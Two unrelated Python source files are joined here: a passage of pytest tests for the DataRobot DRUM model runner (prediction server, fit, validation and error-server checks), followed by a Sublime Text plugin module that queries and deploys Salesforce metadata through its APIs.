[(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN), (SKLEARN, BINARY, PYTHON, None)],
)
def test_custom_models_drum_prediction_server_response(
self, framework, problem, language, docker, tmp_path
):
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
with DrumServerRun(framework, problem, custom_model_dir, docker) as run:
input_dataset = self._get_dataset_filename(framework, problem)
# do predictions
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
assert response.ok
response_json = json.loads(response.text)
assert isinstance(response_json, dict)
assert RESPONSE_PREDICTIONS_KEY in response_json
predictions_list = response_json[RESPONSE_PREDICTIONS_KEY]
assert isinstance(predictions_list, list)
assert len(predictions_list)
prediction_item = predictions_list[0]
if problem == BINARY:
assert isinstance(prediction_item, dict)
assert len(prediction_item) == 2
assert all([isinstance(x, str) for x in prediction_item.keys()])
assert all([isinstance(x, float) for x in prediction_item.values()])
elif problem == REGRESSION:
assert isinstance(prediction_item, float)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[(SKLEARN, BINARY, PYTHON, None), (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN)],
)
def test_custom_models_perf_test(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} perf-test -i 10 -s 1000 --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, BINARY, PYTHON, None),
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, DOCKER_PYTHON_SKLEARN),
],
)
def test_custom_models_validation_test(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} validation --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
if language == NO_CUSTOM:
assert re.search(r"Null value imputation\s+FAILED", stdo)
else:
assert re.search(r"Null value imputation\s+PASSED", stdo)
@pytest.mark.parametrize("language, language_suffix", [("python", ".py"), ("r", ".R")])
def test_template_creation(self, language, language_suffix, tmp_path):
print("Running template creation tests: {}".format(language))
directory = tmp_path / "template_test_{}".format(uuid4())
cmd = "{drum_prog} new model --language {language} --code-dir {directory}".format(
drum_prog=ArgumentsOptions.MAIN_COMMAND, language=language, directory=directory
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed creating a template for custom model, cmd={}".format(cmd)
)
assert os.path.isdir(directory), "Directory {} does not exists (or not a dir)".format(
directory
)
assert os.path.isfile(os.path.join(directory, "README.md"))
custom_file = os.path.join(directory, CUSTOM_FILE_NAME + language_suffix)
assert os.path.isfile(custom_file)
@staticmethod
def _add_weights_cmd(weights, input_csv):
df = pd.read_csv(input_csv)
colname = "some-colname"
weights_data = pd.Series(np.random.randint(1, 3, len(df)))
__keep_this_around = NamedTemporaryFile("w")
if weights == WEIGHTS_ARGS:
df[colname] = weights_data
df.to_csv(__keep_this_around.name)
return " --row-weights " + colname, __keep_this_around.name, __keep_this_around
elif weights == WEIGHTS_CSV:
weights_data.to_csv(__keep_this_around.name)
return " --row-weights-csv " + __keep_this_around.name, input_csv, __keep_this_around
return "", input_csv, __keep_this_around
@pytest.mark.parametrize("framework", [RDS, SKLEARN, XGB, KERAS, PYTORCH])
@pytest.mark.parametrize("problem", [BINARY, REGRESSION])
@pytest.mark.parametrize("docker", [DOCKER_PYTHON_SKLEARN, None])
@pytest.mark.parametrize("weights", [WEIGHTS_CSV, WEIGHTS_ARGS, None])
@pytest.mark.parametrize("use_output", [True, False])
@pytest.mark.parametrize("nested", [True, False])
def test_fit(self, framework, problem, docker, weights, use_output, tmp_path, nested):
if docker and framework != SKLEARN:
return
if framework == RDS:
language = R_FIT
else:
language = PYTHON
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir,
framework,
problem,
language,
is_training=True,
nested=nested if language == PYTHON else False, # TODO: support nested R files
)
input_dataset = self._get_dataset_filename(framework, problem)
weights_cmd, input_dataset, __keep_this_around = self._add_weights_cmd(
weights, input_dataset
)
output = tmp_path / "output"
output.mkdir()
cmd = "{} fit --code-dir {} --target {} --input {} --verbose ".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[problem], input_dataset
)
if use_output:
cmd += " --output {}".format(output)
if problem == BINARY:
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {} ".format(docker)
cmd += weights_cmd
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
def _create_fit_input_data_dir(self, input_dir, problem, weights):
input_dir.mkdir(parents=True, exist_ok=True)
input_dataset = self._get_dataset_filename(None, problem)
df = pd.read_csv(input_dataset)
# Training data
with open(os.path.join(input_dir, "X.csv"), "w+") as fp:
feature_df = df.loc[:, df.columns != self.target[problem]]
feature_df.to_csv(fp, index=False)
# Target data
with open(os.path.join(input_dir, "y.csv"), "w+") as fp:
target_series = df[self.target[problem]]
target_series.to_csv(fp, index=False, header="Target")
# Weights data
if weights:
df = pd.read_csv(input_dataset)
weights_data = pd.Series(np.random.randint(1, 3, len(df)))
with open(os.path.join(input_dir, "weights.csv"), "w+") as fp:
weights_data.to_csv(fp, header=False)
@pytest.mark.parametrize("framework", [SKLEARN, XGB, KERAS])
@pytest.mark.parametrize("problem", [BINARY, REGRESSION])
@pytest.mark.parametrize("language", [PYTHON])
@pytest.mark.parametrize("weights", [WEIGHTS_CSV, None])
def test_fit_sh(self, framework, problem, language, weights, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir, framework, problem, language, is_training=True
)
env = os.environ
fit_sh = os.path.join(
self.tests_root_path,
"..",
"public_dropin_environments/{}_{}/fit.sh".format(language, framework),
)
input_dir = tmp_path / "input_dir"
self._create_fit_input_data_dir(input_dir, problem, weights)
output = tmp_path / "output"
output.mkdir()
env["CODEPATH"] = str(custom_model_dir)
env["INPUT_DIRECTORY"] = str(input_dir)
env["ARTIFACT_DIRECTORY"] = str(output)
if problem == BINARY:
labels = self._get_class_labels(framework, problem)
env["NEGATIVE_CLASS_LABEL"] = labels[0]
env["POSITIVE_CLASS_LABEL"] = labels[1]
else:
if os.environ.get("NEGATIVE_CLASS_LABEL"):
del os.environ["NEGATIVE_CLASS_LABEL"]
del os.environ["POSITIVE_CLASS_LABEL"]
TestCMRunner._exec_shell_cmd(fit_sh, "Failed cmd {}".format(fit_sh), env=env)
def test_fit_simple(self, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir, SIMPLE, REGRESSION, PYTHON, is_training=True, nested=True
)
input_dataset = self._get_dataset_filename(SKLEARN, REGRESSION)
output = tmp_path / "output"
output.mkdir()
cmd = "{} fit --code-dir {} --target {} --input {} --verbose".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[REGRESSION], input_dataset,
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
class TestDrumRuntime:
@classmethod
def setup_class(cls):
TestCMRunner.setup_class()
Options = collections.namedtuple(
"Options",
"with_error_server {} docker address verbose show_stacktrace".format(
CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD
),
defaults=[RunMode.SERVER, None, "localhost", False, True],
)
class StubDrumException(Exception):
pass
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_no_exceptions(self, mock_run_error_server):
with DrumRuntime():
pass
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_no_options(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime():
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_initialization_succeeded(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False)
runtime.initialization_succeeded = True
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_not_server_mode(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False, RunMode.SCORE)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
    def test_exception_docker(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False, RunMode.SERVER, "path_to_image")
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_no_with_error_server(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_with_error_server(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(True)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_called()
@pytest.fixture(params=[REGRESSION, BINARY])
def params(self, request, tmp_path):
framework = SKLEARN
language = PYTHON
problem = request.param
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
server_run_args = dict(
framework=framework, problem=problem, custom_model_dir=custom_model_dir,
)
return framework, problem, custom_model_dir, server_run_args
def assert_drum_server_run_failure(self, server_run_args, with_error_server, error_message):
drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)
if with_error_server:
            # assert that the error server is up and the message is propagated via the API
with drum_server_run as run:
# check /health/ route
response = requests.get(run.url_server_address + "/health/")
assert response.status_code == 513
assert error_message in response.json()["message"]
# check /predict/ route
response = requests.post(run.url_server_address + "/predict/")
assert response.status_code == 513
assert error_message in response.json()["message"]
else:
# DrumServerRun tries to ping the server.
            # assert that the process is already dead once it's done.
with pytest.raises(ProcessLookupError), drum_server_run:
pass
assert drum_server_run.process.returncode == 1
assert error_message in drum_server_run.process.err_stream
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_no_model_artifact(self, params, with_error_server):
"""
Verify that if an error occurs on drum server initialization if no model artifact is found
- if '--with-error-server' is not set, drum server process will exit with error
- if '--with-error-server' is set, 'error server' will still be started, and
will be serving initialization error
"""
_, _, custom_model_dir, server_run_args = params
error_message = "Could not find model artifact file"
# remove model artifact
for item in os.listdir(custom_model_dir):
if item.endswith(PythonArtifacts.PKL_EXTENSION):
os.remove(os.path.join(custom_model_dir, item))
self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_model_loading_fails(self, params, with_error_server):
"""
Verify that if an error occurs on drum server initialization if model cannot load properly
- if '--with-error-server' is not set, drum server process will exit with error
- if '--with-error-server' is set, 'error server' will still be started, and
will be serving initialization error
"""
_, _, custom_model_dir, server_run_args = params
error_message = (
"Could not find any framework to handle loaded model and a score hook is not provided"
)
# make model artifact invalid by erasing its content
for item in os.listdir(custom_model_dir):
if item.endswith(PythonArtifacts.PKL_EXTENSION):
with open(os.path.join(custom_model_dir, item), "wb") as f:
f.write(pickle.dumps("invalid model content"))
self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_predict_fails(self, params, with_error_server):
"""
Verify that when drum server is started, if an error occurs on /predict/ route,
'error server' is not started regardless '--with-error-server' flag.
"""
framework, problem, custom_model_dir, server_run_args = params
# remove a module required during processing of /predict/ request
os.remove(os.path.join(custom_model_dir, "custom.py"))
drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)
with drum_server_run as run:
input_dataset = TestCMRunner._get_dataset_filename(framework, problem)
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
assert response.status_code == 500 # error occurs
# assert that 'error server' is not started.
# as 'error server' propagates errors with 513 status code,
# assert that after error occurred, the next request is not 513
# check /health/ route
response = requests.get(run.url_server_address + "/health/")
assert response.status_code == 200
# check /predict/ route
response = requests.post(run.url_server_address + "/predict/")
error_message = "ERROR: Samples should be provided as a csv file under `X` key."
assert response.status_code == 422
assert response.json()["message"] == error_message
assert drum_server_run.process.returncode == 0
|
processor.py
|
import sublime
import sublime_plugin
import os
import xml
import urllib
import json
import threading
import time
import pprint
import urllib.parse
import shutil
import datetime
import math
from xml.sax.saxutils import unescape
from . import requests, context, util
from .context import COMPONENT_METADATA_SETTINGS
from .salesforce import soap, message
from .salesforce.api.bulk import BulkJob
from .salesforce.api.bulk import BulkApi
from .salesforce.api.metadata import MetadataApi
from .salesforce.api.tooling import ToolingApi
from .salesforce.api.apex import ApexApi
from .salesforce.lib.panel import Printer
from .progress import ThreadProgress, ThreadsProgress
from .salesforce.lib import diff
def handle_populate_users(callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
        if api.result and api.result["success"]:
records = api.result["records"]
users = {}
for record in records:
if not record["FirstName"]:
name = "%s => %s" % (record["LastName"], record["Username"])
else:
name = "%s => %s" % (
"%s %s" % (record["LastName"], record["FirstName"]),
record["Username"]
)
users[name] = record["Id"]
util.add_config_history("users", users, settings)
sublime.active_window().run_command(callback_command)
    # If the users cache already exists in `.config/users.json`, just return it
settings = context.get_settings()
user_cache = os.path.join(settings["workspace"], ".config", "users.json")
if os.path.isfile(user_cache): return json.loads(open(user_cache).read())
    # If it does not exist, query the org and run the callback command when done
api = ToolingApi(settings)
query = "SELECT Id, FirstName, LastName, Username FROM User WHERE IsActive = true"
thread = threading.Thread(target=api.query_all, args=(query, ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Downloading Users List", "Succeed to download users list")
def populate_sobject_recordtypes():
"""
Get dict ([sobject, recordtype name] => recordtype id) in whole org
@return: {
username , "sobject_recordtypes": {
sobject + rtname: rtid
}
...
}
"""
# Get settings
settings = context.get_settings()
    # If the record type cache already exists in `.config/recordtype.json`, just return it
recordtype_path = settings["workspace"]+"/.config/recordtype.json"
if os.path.isfile(recordtype_path):
recordtype = json.loads(open(recordtype_path).read())
return recordtype
    # If the cache does not exist, send a request to populate it
api = ToolingApi(settings)
query = "SELECT Id, Name, SobjectType FROM RecordType"
thread = threading.Thread(target=api.query_all, args=(query, ))
thread.start()
while thread.is_alive() or not api.result:
time.sleep(1)
# Exception Process
if not api.result["success"]:
Printer.get('error').write(message.SEPRATE.format(util.format_error_message(api.result)))
return
records = api.result["records"]
sobject_recordtypes = {}
for recordtype in records:
sobject_type = recordtype["SobjectType"]
recordtype_name = recordtype["Name"]
recordtype_id = recordtype["Id"]
sobject_recordtypes[sobject_type + ", " + recordtype_name] = recordtype_id
# Add Master of every sobject to List
sobjects_describe = util.populate_sobjects_describe()
for sobject_type in sobjects_describe:
sobject_describe = sobjects_describe[sobject_type]
if not sobject_describe["layoutable"]: continue
sobject_recordtypes[sobject_type + ", Master"] = "012000000000000AAA"
util.add_config_history("recordtype", sobject_recordtypes, settings)
return sobject_recordtypes
def handle_update_user_language(language, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
session = util.get_session_info(settings)
if not session:
return Printer.get('error').write("Login is required before this action")
patch_url = "/sobjects/User/%s" % session["user_id"]
thread = threading.Thread(target=api.patch,
args=(patch_url, {"LanguageLocaleKey": language}, ))
thread.start()
ThreadProgress(api, thread, "Updating User Language to " + language,
"User language is updated to " + language)
def handle_enable_development_mode(user_id, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
patch_url = "/sobjects/User/%s" % user_id
thread = threading.Thread(target=api.patch,
args=(patch_url, {"UserPreferencesApexPagesDeveloperMode": True}, ))
thread.start()
ThreadProgress(api, thread, "Enabling User Development Mode",
"Succeed to Enabling User Development Mode")
def handle_update_user_password(user_id, new_password, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.manage_password, args=(
user_id, {"NewPassword": new_password},
))
thread.start()
    masked_password = new_password[:3] + "*" * len(new_password[3:])
ThreadProgress(api, thread, "Updating User Password to " + masked_password,
"Succeed to update user password to " + masked_password)
def handle_login_thread(callback_options={}, force=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if result and result["success"]:
if "callback_command" in callback_options:
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
sublime.active_window().run_command(callback_command, args)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.login, args=(force, ))
thread.start()
handle_thread(thread, timeout)
default_project_name = settings["default_project_name"]
ThreadProgress(api, thread, "Login to %s" % default_project_name,
default_project_name + " Login Succeed")
def handle_view_code_coverage(component_name, component_id, body, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no available code coverage")
return
# Populate the coverage info from server
uncovered_lines = result["records"][0]["Coverage"]["uncoveredLines"]
covered_lines = result["records"][0]["Coverage"]["coveredLines"]
covered_lines_count = len(covered_lines)
uncovered_lines_count = len(uncovered_lines)
total_lines_count = covered_lines_count + uncovered_lines_count
if total_lines_count == 0:
Printer.get("log").write("There is no available code coverage")
return
coverage_percent = covered_lines_count / total_lines_count * 100
# Append coverage statistic info
coverage_statistic = "%s Coverage: %.2f%%(%s/%s)" % (
component_name, coverage_percent,
covered_lines_count, total_lines_count
)
# If has coverage, just add coverage info to new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": coverage_statistic,
"input": body
})
# Calculate line coverage
split_lines = view.lines(sublime.Region(0, view.size()))
uncovered_region = []
for region in split_lines:
# The first four Lines are the coverage info
line = view.rowcol(region.begin() + 1)[0] + 1
if line in uncovered_lines:
uncovered_region.append(region)
# Append body with uncovered line
view.add_regions("uncovered_lines", uncovered_region, "invalid", "dot",
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Coverage FROM ApexCodeCoverageAggregate " +\
"WHERE ApexClassOrTriggerId = '{0}'".format(component_id)
thread = threading.Thread(target=api.query, args=(query, True, ))
thread.start()
ThreadProgress(api, thread, "View Code Coverage of " + component_name,
"View Code Coverage of " + component_name + " Succeed")
handle_thread(thread, timeout)
def handle_refresh_folder(types, ignore_package_xml=True, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
        # Bail out if the request did not succeed
if not api.result or not api.result["success"]: return
# Get refresh result
result = api.result
# Populate extract_to directory
extract_to = settings["workspace"]
        # Extract the zip; ignore_package_xml=True means do not overwrite package.xml
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to, ignore_package_xml, ))
thread.start()
util.reload_file_attributes(result["fileProperties"], settings)
# Hide panel 0.5 seconds later
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types}, ))
thread.start()
handle_thread(thread, timeout)
message = "Refresh Folder"
ThreadProgress(api, thread, message, message+" Succeed")
def handle_reload_symbol_tables(timeout=120):
"""
Reload Symbol Tables to Local Cache
"""
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]: return
# Get the username of default project
username = settings["username"]
# Save symbolTable to component_metadata.sublime-settings
symbol_table_cache = sublime.load_settings("symbol_table.sublime-settings")
symboltable_dict = symbol_table_cache.get(username, {})
for record in result["records"]:
# Sometimes symbolTable is null, just skip
if not record["SymbolTable"]: continue
# Outer completions
outer = util.parse_symbol_table(record["SymbolTable"])
symboltable_dict[record["Name"].lower()] = {
"outer" : outer,
"name": record["Name"]
}
# Inner completions
inners = {}
for inn in record["SymbolTable"]["innerClasses"]:
inner = util.parse_symbol_table(inn)
inners[inn["name"].lower()] = inner
symboltable_dict[record["Name"].lower()]["inners"] = inners
symbol_table_cache.set(settings["username"], symboltable_dict)
sublime.save_settings("symbol_table.sublime-settings")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_symbol_table, args=(30, ))
thread.start()
    waiting_message = "Reloading Symbol Tables"
    ThreadProgress(api, thread, waiting_message, waiting_message + " Succeed")
handle_thread(thread, timeout)
def handle_reload_sobjects_completions(timeout=120):
"""
Save sobject describe to local which is used in completions
"""
def handle_threads(apis, threads, timeout):
for thread in threads:
if thread.is_alive():
sublime.set_timeout(lambda: handle_threads(apis, threads, timeout), timeout)
return
        # If succeeded, gather all the sobject describe results
results = []
for api in apis:
results.extend(api.result)
# Save all sobject describe result to sublime settings
s = sublime.load_settings("sobjects_completion.sublime-settings")
sobjects_completion = {"sobjects": {}}
all_parent_relationship_dict = {}
all_child_relationship_dict = {}
for sobject_describe in results:
# Initiate Sobject completions
if "name" not in sobject_describe:
continue
sobject_name = sobject_describe["name"]
            # Use the lower-cased sobject name as the completion key
            sobject_name = sobject_name.lower()
sobjects_completion["sobjects"][sobject_name] = {
"name": sobject_describe["name"],
"keyPrefix": sobject_describe["keyPrefix"],
"layoutable": sobject_describe["layoutable"],
"triggerable": sobject_describe["triggerable"]
}
# Combine Fields dict, Picklist Field dict and parent relationship dict
fields_dict = {}
picklist_field_dict = {}
parent_relationship_dict = {}
child_relationship_dict = {}
for f in sobject_describe["fields"]:
field_name = f["name"]
precision = f["precision"]
scale = f["scale"]
field_type = f["type"]
referenceTo = f["referenceTo"] if "referenceTo" in f else []
if f["calculatedFormula"]:
capitalize_field = field_type.capitalize()
field_desc_dict = {
"double": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"currency": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"date": "Formula(Date)",
"datetime": "Formula(Datetime)",
"boolean": "Formula(Boolean)",
"int": "Formula(Integer)",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"other": "Formula(%s, %s)" % (capitalize_field, f["length"])
}
else:
field_desc_dict = {
"double": "Double(%s, %s)" % (precision, scale),
"currency": "Currency(%s, %s)" % (precision, scale),
"date": "Date",
"datetime": "Datetime",
"boolean": "Boolean",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"int": "Integer",
"other": "%s(%s)" % (field_type.capitalize(), f["length"])
}
# Mark External Id (E), Unique (U) and Required (R) fields
externalUniqueNotation = ""
if f["externalId"] or f["unique"]:
externalUniqueNotation = "[%s%s%s] " % (
"E" if f["externalId"] else "",
"U" if f["unique"] else "",
"R" if not f["nillable"] else ""
)
# If display_field_name_and_label setting is true,
# display both field name and field label
field_name_desc = "%s(%s)" % (field_name, f["label"]) \
if settings["display_field_name_and_label"] else field_name
# Display field type with specified format
field_type_desc = field_desc_dict[field_type] if field_type \
in field_desc_dict else field_desc_dict["other"]
fd = "%s%s\t%s" % (externalUniqueNotation, field_name_desc, field_type_desc)
fields_dict[fd] = field_name
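# e.g. (hypothetical describe data) an external-id text field might yield
# "[E] AccountNumber(Account Number)\tString(40)" -> "AccountNumber"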
# Picklist Dict
if f["type"] == "picklist":
picklists = []
for picklistValue in f["picklistValues"]:
picklists.append({
"label": picklistValue["label"],
"value": picklistValue["value"]
})
picklist_field_dict[field_name] = picklists
# List all reference field relationship names as fields
# Some fields reference two or more sObjects, so we can't list their fields
if not len(f["referenceTo"]) == 1: continue
parentRelationshipName = f["relationshipName"]
if not parentRelationshipName: continue
parentSobject = f["referenceTo"][0]
if parentRelationshipName in all_parent_relationship_dict:
is_duplicate = False
for so in all_parent_relationship_dict[parentRelationshipName]:
if parentSobject == so:
is_duplicate = True
break
if not is_duplicate:
all_parent_relationship_dict[parentRelationshipName].append(parentSobject)
else:
all_parent_relationship_dict[parentRelationshipName] = [parentSobject]
# Add Parent Relationship Name
parent_relationship_dict[f["relationshipName"]] = parentSobject
# Child Relationship dict
for f in sobject_describe["childRelationships"]:
childRelationshipName = f["relationshipName"]
childSobject = f["childSObject"]
if not childRelationshipName: continue
# Add Parent Relationship Name as Field
child_relationship_dict[childRelationshipName] = childSobject
# Combine sobject fields dict and sobject child relationship dict
sobjects_completion["sobjects"][sobject_name]["fields"] = fields_dict
sobjects_completion["sobjects"][sobject_name]["picklist_fields"] = picklist_field_dict
sobjects_completion["sobjects"][sobject_name]["parentRelationships"] = parent_relationship_dict
sobjects_completion["sobjects"][sobject_name]["childRelationships"] = child_relationship_dict
# Populate Child Relationship and Parent Relationship
sobjects_completion["parentRelationships"] = all_parent_relationship_dict
# sobjects_completion["childRelationships"] = all_child_relationship_dict
# Every project has unique username
username = settings["username"]
s.set(username, sobjects_completion)
# Save settings
sublime.save_settings("sobjects_completion.sublime-settings")
# Reload cache for completions
from . import completions
sublime.set_timeout(lambda:completions.load_sobject_cache(
True, username
), 5)
def handle_thread(api, thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(api, thread, timeout), timeout)
return
# Exception Process
if not api.result or not api.result["success"]:
return
# Get describe result of all sObjects
sobjects_describe = api.result["sobjects"]
sobjects = list(sobjects_describe.keys())
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
threads = []
apis = []
for sobjects in chunked_sobjects:
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_sobjects, args=(sobjects, ))
thread.start()
threads.append(thread)
apis.append(api)
ThreadsProgress(threads, "Download Cache of Sobjects", "Download Cache of Sobjects Succeed")
handle_threads(apis, threads, 10)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get_sobjects, args=())
thread.start()
ThreadProgress(api, thread, "Global Describe", "Global Describe Succeed")
handle_thread(api, thread, timeout)
def handle_destructive_files(dirs_or_files, ignore_folder=True, timeout=120):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# After succeed, remove dirs_or_files and related *-meta.xml from local
if "body" in api.result and api.result["body"]["status"] == "Succeeded":
win = sublime.active_window()
for _file_or_dir in dirs_or_files:
# Remove file from local disk and close the related view
view = util.get_view_by_file_name(_file_or_dir)
if view:
win.focus_view(view)
win.run_command("close")
if os.path.isfile(_file_or_dir):
os.remove(_file_or_dir)
else:
shutil.rmtree(_file_or_dir)
# Remove related *-meta.xml file from local disk and close the related view
if ignore_folder and os.path.isfile(_file_or_dir+"-meta.xml"):
view = util.get_view_by_file_name(_file_or_dir+"-meta.xml")
if view:
win.focus_view(view)
win.run_command("close")
os.remove(_file_or_dir+"-meta.xml")
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_files(dirs_or_files, ignore_folder)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip, ))
thread.start()
ThreadProgress(api, thread, "Destructing Files", "Destructing Files Succeed")
handle_thread(thread, timeout)
def handle_destructive_package_xml(types, timeout=120):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_package_xml(types)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip, ))
thread.start()
ThreadProgress(api, thread, "Destructing Package.xml", "Destructing Package.xml Succeed")
handle_thread(thread, timeout)
def handle_deploy_thread(base64_encoded_zip,
source_org=None, element=None, chosen_classes=[], timeout=120, update_meta=False):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
result = api.result
body = result["body"]
if body["status"] == "Succeeded" and update_meta:
handle_update_aura_meta(body, element)
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.deploy, args=(
base64_encoded_zip,
chosen_classes,
))
thread.start()
ThreadProgress(api, thread, "Deploy Metadata to %s" % settings["default_project_name"],
"Metadata Deployment Finished")
handle_thread(thread, timeout)
